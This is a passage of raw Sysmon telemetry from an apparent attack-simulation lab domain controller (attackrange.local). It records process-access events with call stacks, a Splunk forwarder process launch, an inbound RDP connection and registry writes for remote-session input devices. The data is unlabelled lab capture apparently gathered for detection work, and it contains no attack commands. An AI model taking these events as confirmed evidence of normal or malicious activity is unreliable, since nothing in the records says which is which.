Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4730-6000-0005-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4730-6000-0005-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.139{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4730-6000-0005-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:20.140{08A6967A-4730-6000-0005-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:27.436{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:27.436{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:27.436{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:29.092{08A6967A-4288-6000-1000-000000009A01}11364400C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:29.092{08A6967A-4288-6000-1000-000000009A01}11364400C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000009330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localRDP2021-01-14 13:29:49.551{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.90.199.65ip5f5ac741.dynamic.kabel-deutschland.de59750-false10.0.1.14win-dc-250.attackrange.local3389ms-wbt-server 13241300x80000000000000009386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.920{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.920{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000009384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.920{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000009383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.920{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.920{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x80000000000000009381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.920{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000009380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 13241300x80000000000000009379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000009377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000009376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000009375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x80000000000000009374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000009373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 13:29:52.904{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 10341000x80000000000000009372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:52.842{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 